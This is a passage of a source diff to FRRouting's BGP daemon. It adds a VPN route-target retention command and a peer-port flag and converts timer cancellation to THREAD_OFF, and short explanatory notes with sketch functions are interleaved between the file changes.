+ NO_STR BGP_STR
+ "Retain BGP updates\n"
+ "Retain BGP updates based on route-target values\n"
+ "Retain all BGP updates\n")
+{
+ bool check;
+ struct bgp *bgp = VTY_GET_CONTEXT(bgp);
+
+ check = CHECK_FLAG(bgp->af_flags[bgp_node_afi(vty)][bgp_node_safi(vty)],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
+ if (check != !no) {
+ if (!no)
+ SET_FLAG(bgp->af_flags[bgp_node_afi(vty)]
+ [bgp_node_safi(vty)],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
+ else
+ UNSET_FLAG(bgp->af_flags[bgp_node_afi(vty)]
+ [bgp_node_safi(vty)],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
+ /* trigger a flush to re-sync with ADJ-RIB-in */
+ bgp_clear(vty, bgp, bgp_node_afi(vty), bgp_node_safi(vty),
+ clear_all, BGP_CLEAR_SOFT_IN, NULL);
+ }
+ return CMD_SUCCESS;
+}
+
static void bgp_config_write_redistribute(struct vty *vty, struct bgp *bgp,
afi_t afi, safi_t safi)
{
@@ -17197,6 +17263,14 @@ static void bgp_config_write_peer_af(struct vty *vty, struct bgp *bgp,
}
}
+static void bgp_vpn_config_write(struct vty *vty, struct bgp *bgp, afi_t afi,
+ safi_t safi)
+{
+ if (!CHECK_FLAG(bgp->af_flags[afi][safi],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL))
+ vty_out(vty, " no bgp retain route-target all\n");
+}
+
/* Address family based peer configuration display. */
static void bgp_config_write_family(struct vty *vty, struct bgp *bgp, afi_t afi,
safi_t safi)
@@ -17267,6 +17341,9 @@ static void bgp_config_write_family(struct vty *vty, struct bgp *bgp, afi_t afi,
if (safi == SAFI_FLOWSPEC)
bgp_fs_config_write_pbr(vty, bgp, afi, safi);
+ if (safi == SAFI_MPLS_VPN)
+ bgp_vpn_config_write(vty, bgp, afi, safi);
+
if (safi == SAFI_UNICAST) {
bgp_vpn_policy_config_write_afi(vty, bgp, afi);
if (CHECK_FLAG(bgp->af_flags[afi][safi],
@@ -19251,6 +19328,10 @@ void bgp_vty_init(void)
install_element(BGP_FLOWSPECV6_NODE, &exit_address_family_cmd);
install_element(BGP_EVPN_NODE, &exit_address_family_cmd);
+ /* BGP retain all route-target */
+ install_element(BGP_VPNV4_NODE, &bgp_retain_route_target_cmd);
+ install_element(BGP_VPNV6_NODE, &bgp_retain_route_target_cmd);
+
/* "clear ip bgp commands" */
install_element(ENABLE_NODE, &clear_ip_bgp_all_cmd);
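bgp_clear_soft_in() above is a thin wrapper exported so code outside bgp_vty.c can request an inbound soft clear. A hedged sketch of a possible caller, assuming the retain flag introduced by this change (the function below is hypothetical; only the flag and the wrapper come from the diff):

/* Toggling retention off programmatically needs the same re-sync with
 * Adj-RIB-In that the DEFPY performs via bgp_clear(): drop the flag, then
 * soft-clear inbound so non-imported VPN prefixes are re-evaluated.
 */
static void vpn_retain_all_disable(struct bgp *bgp, afi_t afi)
{
	UNSET_FLAG(bgp->af_flags[afi][SAFI_MPLS_VPN],
		   BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
	bgp_clear_soft_in(bgp, afi, SAFI_MPLS_VPN);
}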
diff --git a/bgpd/bgp_vty.h b/bgpd/bgp_vty.h
index 143d3c1ac5..9526b50fb9 100644
--- a/bgpd/bgp_vty.h
+++ b/bgpd/bgp_vty.h
@@ -28,23 +28,20 @@ struct bgp;
#define BGP_INSTANCE_HELP_STR "BGP view\nBGP VRF\nView/VRF name\n"
#define BGP_INSTANCE_ALL_HELP_STR "BGP view\nBGP VRF\nAll Views/VRFs\n"
+#define BGP_AF_STR "Address Family\n"
+#define BGP_AF_MODIFIER_STR "Address Family modifier\n"
#define BGP_AFI_CMD_STR "<ipv4|ipv6>"
-#define BGP_AFI_HELP_STR "Address Family\nAddress Family\n"
+#define BGP_AFI_HELP_STR BGP_AF_STR BGP_AF_STR
#define BGP_SAFI_CMD_STR "<unicast|multicast|vpn>"
#define BGP_SAFI_HELP_STR \
- "Address Family modifier\n" \
- "Address Family modifier\n" \
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR
#define BGP_AFI_SAFI_CMD_STR BGP_AFI_CMD_STR" "BGP_SAFI_CMD_STR
#define BGP_AFI_SAFI_HELP_STR BGP_AFI_HELP_STR BGP_SAFI_HELP_STR
#define BGP_SAFI_WITH_LABEL_CMD_STR "<unicast|multicast|vpn|labeled-unicast|flowspec>"
#define BGP_SAFI_WITH_LABEL_HELP_STR \
- "Address Family modifier\n" \
- "Address Family modifier\n" \
- "Address Family modifier\n" \
- "Address Family modifier\n" \
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR \
+ BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR
#define SHOW_GR_HEADER \
"Codes: GR - Graceful Restart," \
@@ -152,6 +149,7 @@ struct bgp;
"endOfRibSentAfterUpdate"); \
} while (0)
+extern void bgp_clear_soft_in(struct bgp *bgp, afi_t afi, safi_t safi);
extern void bgp_vty_init(void);
extern void community_alias_vty(void);
extern const char *get_afi_safi_str(afi_t afi, safi_t safi, bool for_json);
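The BGP_AF_STR / BGP_AF_MODIFIER_STR refactor above relies on C's compile-time concatenation of adjacent string literals, so the composed help strings are byte-for-byte identical to the old hand-written ones. A standalone illustration (local macro copies, not the real headers):

#include <stdio.h>

#define BGP_AF_STR "Address Family\n"
#define BGP_AFI_HELP_STR BGP_AF_STR BGP_AF_STR

int main(void)
{
	/* adjacent literals concatenate at translation time, so this prints
	 * "Address Family" twice, exactly like the former inline strings */
	fputs(BGP_AFI_HELP_STR, stdout);
	return 0;
}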
diff --git a/bgpd/bgp_zebra.c b/bgpd/bgp_zebra.c
index fc7590dcc2..2151d0a613 100644
--- a/bgpd/bgp_zebra.c
+++ b/bgpd/bgp_zebra.c
@@ -2687,6 +2687,11 @@ static void bgp_encode_pbr_rule_action(struct stream *s,
else
stream_putl(s, pbra->fwmark); /* fwmark */
+ stream_putl(s, 0); /* queue id */
+ stream_putw(s, 0); /* vlan_id */
+ stream_putw(s, 0); /* vlan_flags */
+ stream_putw(s, 0); /* pcp */
+
stream_putl(s, pbra->table_id);
memset(ifname, 0, sizeof(ifname));
diff --git a/bgpd/bgpd.c b/bgpd/bgpd.c
index 122830343c..bd3e61377a 100644
--- a/bgpd/bgpd.c
+++ b/bgpd/bgpd.c
@@ -2401,12 +2401,12 @@ void peer_nsf_stop(struct peer *peer)
peer->nsf[afi][safi] = 0;
if (peer->t_gr_restart) {
- BGP_TIMER_OFF(peer->t_gr_restart);
+ THREAD_OFF(peer->t_gr_restart);
if (bgp_debug_neighbor_events(peer))
zlog_debug("%pBP graceful restart timer stopped", peer);
}
if (peer->t_gr_stale) {
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_stale);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP graceful restart stalepath timer stopped",
@@ -3240,6 +3240,8 @@ static struct bgp *bgp_create(as_t *as, const char *name,
bgp->vpn_policy[afi].export_vrf = list_new();
bgp->vpn_policy[afi].export_vrf->del =
bgp_vrf_string_name_delete;
+ SET_FLAG(bgp->af_flags[afi][SAFI_MPLS_VPN],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
}
if (name)
bgp->name = XSTRDUP(MTYPE_BGP, name);
@@ -3584,7 +3586,7 @@ void bgp_instance_down(struct bgp *bgp)
/* Stop timers. */
if (bgp->t_rmap_def_originate_eval) {
- BGP_TIMER_OFF(bgp->t_rmap_def_originate_eval);
+ THREAD_OFF(bgp->t_rmap_def_originate_eval);
bgp_unlock(bgp); /* TODO - This timer is started with a lock -
why? */
}
@@ -3651,7 +3653,7 @@ int bgp_delete(struct bgp *bgp)
if (!gr_info)
continue;
- BGP_TIMER_OFF(gr_info->t_select_deferral);
+ THREAD_OFF(gr_info->t_select_deferral);
t = gr_info->t_route_select;
if (t) {
@@ -3659,7 +3661,7 @@ int bgp_delete(struct bgp *bgp)
XFREE(MTYPE_TMP, info);
}
- BGP_TIMER_OFF(gr_info->t_route_select);
+ THREAD_OFF(gr_info->t_route_select);
}
if (BGP_DEBUG(zebra, ZEBRA)) {
@@ -3682,7 +3684,7 @@ int bgp_delete(struct bgp *bgp)
/* Stop timers. */
if (bgp->t_rmap_def_originate_eval) {
- BGP_TIMER_OFF(bgp->t_rmap_def_originate_eval);
+ THREAD_OFF(bgp->t_rmap_def_originate_eval);
bgp_unlock(bgp); /* TODO - This timer is started with a lock -
why? */
}
@@ -4261,6 +4263,7 @@ static const struct peer_flag_action peer_flag_action_list[] = {
{PEER_FLAG_EXTENDED_OPT_PARAMS, 0, peer_change_reset},
{PEER_FLAG_ROLE_STRICT_MODE, 0, peer_change_reset},
{PEER_FLAG_ROLE, 0, peer_change_reset},
+ {PEER_FLAG_PORT, 0, peer_change_reset},
{0, 0, 0}};
static const struct peer_flag_action peer_af_flag_action_list[] = {
@@ -4351,7 +4354,7 @@ static void peer_flag_modify_action(struct peer *peer, uint32_t flag)
UNSET_FLAG(peer->sflags, PEER_STATUS_PREFIX_OVERFLOW);
if (peer->t_pmax_restart) {
- BGP_TIMER_OFF(peer->t_pmax_restart);
+ THREAD_OFF(peer->t_pmax_restart);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP Maximum-prefix restart timer canceled",
@@ -5448,11 +5451,13 @@ int peer_default_originate_unset(struct peer *peer, afi_t afi, safi_t safi)
void peer_port_set(struct peer *peer, uint16_t port)
{
peer->port = port;
+ peer_flag_set(peer, PEER_FLAG_PORT);
}
void peer_port_unset(struct peer *peer)
{
peer->port = BGP_PORT_DEFAULT;
+ peer_flag_unset(peer, PEER_FLAG_PORT);
}
/* Set the TCP-MSS value in the peer structure,
@@ -7371,7 +7376,7 @@ static bool peer_maximum_prefix_clear_overflow(struct peer *peer)
UNSET_FLAG(peer->sflags, PEER_STATUS_PREFIX_OVERFLOW);
if (peer->t_pmax_restart) {
- BGP_TIMER_OFF(peer->t_pmax_restart);
+ THREAD_OFF(peer->t_pmax_restart);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP Maximum-prefix restart timer cancelled",
@@ -8228,20 +8233,22 @@ void bgp_terminate(void)
* of a large number of peers this will ensure that no peer is left with
* a dangling connection
*/
- /* reverse bgp_master_init */
- bgp_close();
-
- if (bm->listen_sockets)
- list_delete(&bm->listen_sockets);
- for (ALL_LIST_ELEMENTS(bm->bgp, mnode, mnnode, bgp))
+ bgp_close();
+ /* reverse bgp_master_init */
+ for (ALL_LIST_ELEMENTS(bm->bgp, mnode, mnnode, bgp)) {
+ bgp_close_vrf_socket(bgp);
for (ALL_LIST_ELEMENTS(bgp->peer, node, nnode, peer))
if (peer_established(peer) || peer->status == OpenSent
|| peer->status == OpenConfirm)
bgp_notify_send(peer, BGP_NOTIFY_CEASE,
BGP_NOTIFY_CEASE_PEER_UNCONFIG);
+ }
+
+ if (bm->listen_sockets)
+ list_delete(&bm->listen_sockets);
- BGP_TIMER_OFF(bm->t_rmap_update);
+ THREAD_OFF(bm->t_rmap_update);
bgp_mac_finish();
}
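The PEER_FLAG_PORT additions above let the rest of bgpd distinguish an operator-configured port from the default instead of comparing against BGP_PORT_DEFAULT. A hedged sketch of how a config writer could use it (the function below is hypothetical; peer_flag_check() and the flag come from the diff):

/* Emit "neighbor X port N" only when the port was explicitly configured. */
static void peer_port_config_write(struct vty *vty, struct peer *peer)
{
	if (peer_flag_check(peer, PEER_FLAG_PORT))
		vty_out(vty, " neighbor %s port %u\n", peer->host, peer->port);
}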
diff --git a/bgpd/bgpd.h b/bgpd/bgpd.h
index 7f3d240b8e..bcb214873f 100644
--- a/bgpd/bgpd.h
+++ b/bgpd/bgpd.h
@@ -527,6 +527,8 @@ struct bgp {
/* vrf-route leaking flags */
#define BGP_CONFIG_VRF_TO_VRF_IMPORT (1 << 9)
#define BGP_CONFIG_VRF_TO_VRF_EXPORT (1 << 10)
+/* vpnvx retain flag */
+#define BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL (1 << 11)
/* BGP per AF peer count */
uint32_t af_peer_count[AFI_MAX][SAFI_MAX];
@@ -1343,6 +1345,7 @@ struct peer {
#define PEER_FLAG_ROLE_STRICT_MODE (1ULL << 31)
/* `local-role` configured */
#define PEER_FLAG_ROLE (1ULL << 32)
+#define PEER_FLAG_PORT (1ULL << 33)
/*
*GR-Disabled mode means unset PEER_FLAG_GRACEFUL_RESTART
diff --git a/bgpd/rfapi/rfapi.c b/bgpd/rfapi/rfapi.c
index 35a76e7836..382886e0bd 100644
--- a/bgpd/rfapi/rfapi.c
+++ b/bgpd/rfapi/rfapi.c
@@ -721,7 +721,6 @@ void add_vnc_route(struct rfapi_descriptor *rfd, /* cookie, VPN UN addr, peer */
encaptlv = XCALLOC(MTYPE_ENCAP_TLV,
sizeof(struct bgp_attr_encap_subtlv) + 4);
- assert(encaptlv);
encaptlv->type =
BGP_VNC_SUBTLV_TYPE_LIFETIME; /* prefix lifetime */
encaptlv->length = 4;
@@ -766,7 +765,6 @@ void add_vnc_route(struct rfapi_descriptor *rfd, /* cookie, VPN UN addr, peer */
MTYPE_ENCAP_TLV,
sizeof(struct bgp_attr_encap_subtlv) + 2
+ hop->length);
- assert(encaptlv);
encaptlv->type =
BGP_VNC_SUBTLV_TYPE_RFPOPTION; /* RFP
option
@@ -1041,7 +1039,7 @@ void add_vnc_route(struct rfapi_descriptor *rfd, /* cookie, VPN UN addr, peer */
SET_FLAG(new->flags, BGP_PATH_VALID);
/* save backref to rfapi handle */
- assert(bgp_path_info_extra_get(new));
+ bgp_path_info_extra_get(new);
new->extra->vnc.export.rfapi_handle = (void *)rfd;
encode_label(label_val, &new->extra->label[0]);
@@ -1260,7 +1258,7 @@ static int rfapi_open_inner(struct rfapi_descriptor *rfd, struct bgp *bgp,
* since this peer is not on the I/O thread, this lock is not strictly
* necessary, but serves as a reminder to those who may meddle...
*/
- frr_with_mutex(&rfd->peer->io_mtx) {
+ frr_with_mutex (&rfd->peer->io_mtx) {
// we don't need any I/O related facilities
if (rfd->peer->ibuf)
stream_fifo_free(rfd->peer->ibuf);
@@ -1963,7 +1961,6 @@ int rfapi_open(void *rfp_start_val, struct rfapi_ip_addr *vn,
rfd = XCALLOC(MTYPE_RFAPI_DESC,
sizeof(struct rfapi_descriptor));
}
- assert(rfd);
rfd->bgp = bgp;
if (default_options) {
@@ -3081,7 +3078,7 @@ DEFUN (debug_rfapi_register_vn_un,
DEFUN (debug_rfapi_register_vn_un_l2o,
debug_rfapi_register_vn_un_l2o_cmd,
- "debug rfapi-dev register vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> lifetime SECONDS macaddr YY:YY:YY:YY:YY:YY lni (0-16777215)",
+ "debug rfapi-dev register vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> lifetime SECONDS macaddr X:X:X:X:X:X lni (0-16777215)",
DEBUG_STR
DEBUG_RFAPI_STR
"rfapi_register\n"
@@ -3309,7 +3306,7 @@ DEFUN (debug_rfapi_query_vn_un,
DEFUN (debug_rfapi_query_vn_un_l2o,
debug_rfapi_query_vn_un_l2o_cmd,
- "debug rfapi-dev query vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> lni LNI target YY:YY:YY:YY:YY:YY",
+ "debug rfapi-dev query vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> lni LNI target X:X:X:X:X:X",
DEBUG_STR
DEBUG_RFAPI_STR
"rfapi_query\n"
diff --git a/bgpd/rfapi/rfapi_ap.c b/bgpd/rfapi/rfapi_ap.c
index abb18aeb2c..fcc6168cfa 100644
--- a/bgpd/rfapi/rfapi_ap.c
+++ b/bgpd/rfapi/rfapi_ap.c
@@ -459,7 +459,6 @@ int rfapiApAdd(struct bgp *bgp, struct rfapi_descriptor *rfd,
if (rc) {
/* Not found */
adb = XCALLOC(MTYPE_RFAPI_ADB, sizeof(struct rfapi_adb));
- assert(adb);
adb->lifetime = lifetime;
adb->u.key = rk;
diff --git a/bgpd/rfapi/rfapi_encap_tlv.c b/bgpd/rfapi/rfapi_encap_tlv.c
index a7bc909c58..d4e875df2a 100644
--- a/bgpd/rfapi/rfapi_encap_tlv.c
+++ b/bgpd/rfapi/rfapi_encap_tlv.c
@@ -170,7 +170,6 @@ struct rfapi_un_option *rfapi_encap_tlv_to_un_option(struct attr *attr)
stlv = attr->encap_subtlvs;
uo = XCALLOC(MTYPE_RFAPI_UN_OPTION, sizeof(struct rfapi_un_option));
- assert(uo);
uo->type = RFAPI_UN_OPTION_TYPE_TUNNELTYPE;
uo->v.tunnel.type = attr->encap_tunneltype;
tto = &uo->v.tunnel;
diff --git a/bgpd/rfapi/rfapi_import.c b/bgpd/rfapi/rfapi_import.c
index 1d58c03313..1d42702769 100644
--- a/bgpd/rfapi/rfapi_import.c
+++ b/bgpd/rfapi/rfapi_import.c
@@ -856,13 +856,11 @@ static void rfapiBgpInfoChainFree(struct bgp_path_info *bpi)
*/
if (CHECK_FLAG(bpi->flags, BGP_PATH_REMOVED)
&& bpi->extra->vnc.import.timer) {
-
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb =
+ THREAD_ARG(bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(bpi->extra->vnc.import.timer);
}
next = bpi->next;
@@ -1273,7 +1271,6 @@ rfapiRouteInfo2NextHopEntry(struct rfapi_ip_prefix *rprefix,
#endif
new = XCALLOC(MTYPE_RFAPI_NEXTHOP, sizeof(struct rfapi_next_hop_entry));
- assert(new);
new->prefix = *rprefix;
@@ -1286,7 +1283,6 @@ rfapiRouteInfo2NextHopEntry(struct rfapi_ip_prefix *rprefix,
vo = XCALLOC(MTYPE_RFAPI_VN_OPTION,
sizeof(struct rfapi_vn_option));
- assert(vo);
vo->type = RFAPI_VN_OPTION_TYPE_L2ADDR;
@@ -2308,7 +2304,6 @@ rfapiMonitorEncapAdd(struct rfapi_import_table *import_table,
m = XCALLOC(MTYPE_RFAPI_MONITOR_ENCAP,
sizeof(struct rfapi_monitor_encap));
- assert(m);
m->node = vpn_rn;
m->bpi = vpn_bpi;
@@ -2374,7 +2369,7 @@ static void rfapiMonitorEncapDelete(struct bgp_path_info *vpn_bpi)
*/
static void rfapiWithdrawTimerVPN(struct thread *t)
{
- struct rfapi_withdraw *wcb = t->arg;
+ struct rfapi_withdraw *wcb = THREAD_ARG(t);
struct bgp_path_info *bpi = wcb->info;
struct bgp *bgp = bgp_get_default();
const struct prefix *p;
@@ -2675,7 +2670,7 @@ rfapiWithdrawEncapUpdateCachedUn(struct rfapi_import_table *import_table,
static void rfapiWithdrawTimerEncap(struct thread *t)
{
- struct rfapi_withdraw *wcb = t->arg;
+ struct rfapi_withdraw *wcb = THREAD_ARG(t);
struct bgp_path_info *bpi = wcb->info;
int was_first_route = 0;
struct rfapi_monitor_encap *em;
@@ -2791,7 +2786,6 @@ rfapiBiStartWithdrawTimer(struct rfapi_import_table *import_table,
* service routine, which is supposed to free the wcb.
*/
wcb = XCALLOC(MTYPE_RFAPI_WITHDRAW, sizeof(struct rfapi_withdraw));
- assert(wcb);
wcb->node = rn;
wcb->info = bpi;
wcb->import_table = import_table;
@@ -3093,13 +3087,12 @@ static void rfapiBgpInfoFilteredImportEncap(
*/
if (CHECK_FLAG(bpi->flags, BGP_PATH_REMOVED)
&& bpi->extra->vnc.import.timer) {
-
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb = THREAD_ARG(
+ bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(
+ bpi->extra->vnc.import.timer);
}
if (action == FIF_ACTION_UPDATE) {
@@ -3186,12 +3179,11 @@ static void rfapiBgpInfoFilteredImportEncap(
"%s: removing holddown bpi matching NVE of new route",
__func__);
if (bpi->extra->vnc.import.timer) {
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb =
+ THREAD_ARG(bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(bpi->extra->vnc.import.timer);
}
rfapiExpireEncapNow(import_table, rn, bpi);
}
@@ -3224,7 +3216,6 @@ static void rfapiBgpInfoFilteredImportEncap(
struct agg_table *referenced_vpn_table;
referenced_vpn_table = agg_table_init();
- assert(referenced_vpn_table);
/*
* iterate over the set of monitors at this ENCAP node.
@@ -3282,7 +3273,6 @@ static void rfapiBgpInfoFilteredImportEncap(
mnext = XCALLOC(
MTYPE_RFAPI_MONITOR_ENCAP,
sizeof(struct rfapi_monitor_encap));
- assert(mnext);
mnext->node = m->node;
mnext->next = referenced_vpn_prefix->info;
referenced_vpn_prefix->info = mnext;
@@ -3549,13 +3539,12 @@ void rfapiBgpInfoFilteredImportVPN(
*/
if (CHECK_FLAG(bpi->flags, BGP_PATH_REMOVED)
&& bpi->extra->vnc.import.timer) {
-
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb = THREAD_ARG(
+ bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(
+ bpi->extra->vnc.import.timer);
import_table->holddown_count[afi] -= 1;
RFAPI_UPDATE_ITABLE_COUNT(
@@ -3768,12 +3757,11 @@ void rfapiBgpInfoFilteredImportVPN(
"%s: removing holddown bpi matching NVE of new route",
__func__);
if (bpi->extra->vnc.import.timer) {
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb =
+ THREAD_ARG(bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(bpi->extra->vnc.import.timer);
}
rfapiExpireVpnNow(import_table, rn, bpi, 0);
}
@@ -4332,7 +4320,6 @@ rfapiImportTableRefAdd(struct bgp *bgp, struct ecommunity *rt_import_list,
if (!it) {
it = XCALLOC(MTYPE_RFAPI_IMPORTTABLE,
sizeof(struct rfapi_import_table));
- assert(it);
it->next = h->imports;
h->imports = it;
@@ -4497,12 +4484,11 @@ static void rfapiDeleteRemotePrefixesIt(
if (!delete_holddown)
continue;
if (bpi->extra->vnc.import.timer) {
-
- struct thread **t =
- &(bpi->extra->vnc
- .import.timer);
struct rfapi_withdraw *wcb =
- (*t)->arg;
+ THREAD_ARG(
+ bpi->extra->vnc
+ .import
+ .timer);
wcb->import_table
->holddown_count[afi] -=
@@ -4512,7 +4498,9 @@ static void rfapiDeleteRemotePrefixesIt(
afi, 1);
XFREE(MTYPE_RFAPI_WITHDRAW,
wcb);
- thread_cancel(t);
+ THREAD_OFF(
+ bpi->extra->vnc.import
+ .timer);
}
} else {
if (!delete_active)
@@ -4551,7 +4539,6 @@ static void rfapiDeleteRemotePrefixesIt(
MTYPE_RFAPI_NVE_ADDR,
sizeof(struct
rfapi_nve_addr));
- assert(nap);
*nap = na;
nap->info = is_active
? pAHcount
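The rfapi_import.c conversions above all collapse the old "take a struct thread **, read (*t)->arg, thread_cancel(t)" sequence into THREAD_ARG() plus THREAD_OFF(). A minimal sketch of the resulting idiom, assuming the rfapi types used in the diff (the wrapper function is hypothetical):

/* Read the callback argument first, free it, then cancel; THREAD_OFF() is a
 * no-op on a NULL thread pointer and clears the pointer after cancelling.
 */
static void withdraw_timer_stop(struct bgp_path_info *bpi)
{
	struct rfapi_withdraw *wcb;

	if (!bpi->extra || !bpi->extra->vnc.import.timer)
		return;

	wcb = THREAD_ARG(bpi->extra->vnc.import.timer);
	XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
	THREAD_OFF(bpi->extra->vnc.import.timer);
}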
diff --git a/bgpd/rfapi/rfapi_monitor.c b/bgpd/rfapi/rfapi_monitor.c
index 58a0f8dea7..0e71d5d7e1 100644
--- a/bgpd/rfapi/rfapi_monitor.c
+++ b/bgpd/rfapi/rfapi_monitor.c
@@ -620,7 +620,7 @@ void rfapiMonitorDel(struct bgp *bgp, struct rfapi_descriptor *rfd,
rfapiMonitorDetachImport(m);
}
- thread_cancel(&m->timer);
+ THREAD_OFF(m->timer);
/*
* remove from rfd list
@@ -657,7 +657,7 @@ int rfapiMonitorDelHd(struct rfapi_descriptor *rfd)
rfapiMonitorDetachImport(m);
}
- thread_cancel(&m->timer);
+ THREAD_OFF(m->timer);
XFREE(MTYPE_RFAPI_MONITOR, m);
rn->info = NULL;
@@ -691,7 +691,7 @@ int rfapiMonitorDelHd(struct rfapi_descriptor *rfd)
#endif
}
- thread_cancel(&mon_eth->timer);
+ THREAD_OFF(mon_eth->timer);
/*
* remove from rfd list
@@ -733,7 +733,7 @@ void rfapiMonitorResponseRemovalOn(struct bgp *bgp)
static void rfapiMonitorTimerExpire(struct thread *t)
{
- struct rfapi_monitor_vpn *m = t->arg;
+ struct rfapi_monitor_vpn *m = THREAD_ARG(t);
/* forget reference to thread, it's gone */
m->timer = NULL;
@@ -744,19 +744,17 @@ static void rfapiMonitorTimerExpire(struct thread *t)
static void rfapiMonitorTimerRestart(struct rfapi_monitor_vpn *m)
{
- if (m->timer) {
- unsigned long remain = thread_timer_remain_second(m->timer);
+ unsigned long remain = thread_timer_remain_second(m->timer);
- /* unexpected case, but avoid wraparound problems below */
- if (remain > m->rfd->response_lifetime)
- return;
+ /* unexpected case, but avoid wraparound problems below */
+ if (remain > m->rfd->response_lifetime)
+ return;
- /* don't restart if we just restarted recently */
- if (m->rfd->response_lifetime - remain < 2)
- return;
+ /* don't restart if we just restarted recently */
+ if (m->rfd->response_lifetime - remain < 2)
+ return;
- thread_cancel(&m->timer);
- }
+ THREAD_OFF(m->timer);
{
char buf[BUFSIZ];
@@ -766,7 +764,7 @@ static void rfapiMonitorTimerRestart(struct rfapi_monitor_vpn *m)
rfapi_ntop(m->p.family, m->p.u.val, buf, BUFSIZ),
m->rfd->response_lifetime);
}
- m->timer = NULL;
+
thread_add_timer(bm->master, rfapiMonitorTimerExpire, m,
m->rfd->response_lifetime, &m->timer);
}
@@ -1041,7 +1039,7 @@ void rfapiMonitorMovedUp(struct rfapi_import_table *import_table,
static void rfapiMonitorEthTimerExpire(struct thread *t)
{
- struct rfapi_monitor_eth *m = t->arg;
+ struct rfapi_monitor_eth *m = THREAD_ARG(t);
/* forget reference to thread, it's gone */
m->timer = NULL;
@@ -1054,19 +1052,17 @@ static void rfapiMonitorEthTimerExpire(struct thread *t)
static void rfapiMonitorEthTimerRestart(struct rfapi_monitor_eth *m)
{
- if (m->timer) {
- unsigned long remain = thread_timer_remain_second(m->timer);
+ unsigned long remain = thread_timer_remain_second(m->timer);
- /* unexpected case, but avoid wraparound problems below */
- if (remain > m->rfd->response_lifetime)
- return;
+ /* unexpected case, but avoid wraparound problems below */
+ if (remain > m->rfd->response_lifetime)
+ return;
- /* don't restart if we just restarted recently */
- if (m->rfd->response_lifetime - remain < 2)
- return;
+ /* don't restart if we just restarted recently */
+ if (m->rfd->response_lifetime - remain < 2)
+ return;
- thread_cancel(&m->timer);
- }
+ THREAD_OFF(m->timer);
{
char buf[BUFSIZ];
@@ -1076,7 +1072,7 @@ static void rfapiMonitorEthTimerRestart(struct rfapi_monitor_eth *m)
rfapiEthAddr2Str(&m->macaddr, buf, BUFSIZ),
m->rfd->response_lifetime);
}
- m->timer = NULL;
+
thread_add_timer(bm->master, rfapiMonitorEthTimerExpire, m,
m->rfd->response_lifetime, &m->timer);
}
@@ -1404,7 +1400,7 @@ void rfapiMonitorEthDel(struct bgp *bgp, struct rfapi_descriptor *rfd,
rfapiMonitorEthDetachImport(bgp, val);
}
- thread_cancel(&val->timer);
+ THREAD_OFF(val->timer);
/*
* remove from rfd list
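The two *TimerRestart() hunks above drop the explicit "if (timer)" guard and the manual "timer = NULL" reset, since THREAD_OFF() already handles both. A hedged sketch of the restart idiom they converge on (the wrapper is illustrative; the FRR calls are the ones used in the diff):

/* Cancel any armed timer, then re-arm: thread_add_timer() only schedules
 * when *timer is NULL, so cancelling first guarantees the new interval takes
 * effect.
 */
static void restart_timer(struct thread_master *master, struct thread **timer,
			  void (*handler)(struct thread *), void *arg,
			  unsigned long secs)
{
	THREAD_OFF(*timer);
	thread_add_timer(master, handler, arg, secs, timer);
}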
diff --git a/bgpd/rfapi/rfapi_rib.c b/bgpd/rfapi/rfapi_rib.c
index 44eebe961c..9d61ada7db 100644
--- a/bgpd/rfapi/rfapi_rib.c
+++ b/bgpd/rfapi/rfapi_rib.c
@@ -268,8 +268,8 @@ static void rfapi_info_free(struct rfapi_info *goner)
if (goner->timer) {
struct rfapi_rib_tcb *tcb;
- tcb = goner->timer->arg;
- thread_cancel(&goner->timer);
+ tcb = THREAD_ARG(goner->timer);
+ THREAD_OFF(goner->timer);
XFREE(MTYPE_RFAPI_RECENT_DELETE, tcb);
}
XFREE(MTYPE_RFAPI_INFO, goner);
@@ -293,7 +293,7 @@ struct rfapi_rib_tcb {
*/
static void rfapiRibExpireTimer(struct thread *t)
{
